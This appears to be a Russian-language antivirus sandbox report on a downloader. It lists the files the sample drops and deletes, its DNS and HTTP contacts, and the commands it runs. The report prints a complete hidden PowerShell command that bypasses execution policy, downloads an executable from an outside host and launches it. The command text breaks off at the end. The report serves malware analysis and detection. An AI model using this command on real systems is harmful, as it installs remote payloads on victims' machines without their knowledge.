Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://directexe.com/ttc/new.exe как %temp%\lol.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\35ee.tmp\new 3.bat
- %TEMP%\lol.exe
Удаляет следующие файлы
- %TEMP%\35ee.tmp\new 3.bat
Сетевая активность
Подключается к
- 'di###texe.com':80
- 'su####-smiles.com':80
TCP
Запросы HTTP GET
- http://di###texe.com/Ttc/new.exe
- http://su####-smiles.com/
UDP
- DNS ASK di###texe.com
- DNS ASK su####-smiles.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\35EE.tmp\new 3.bat" "<Полный путь к файлу>""' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\35EE.tmp\new 3.bat" "<Полный путь к файлу>""
- '%WINDIR%\syswow64\cmd.exe' ,/c powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://directexe.com/Ttc/new.exe','%TEMP%\lol.exe');Start-Process %TEMP...
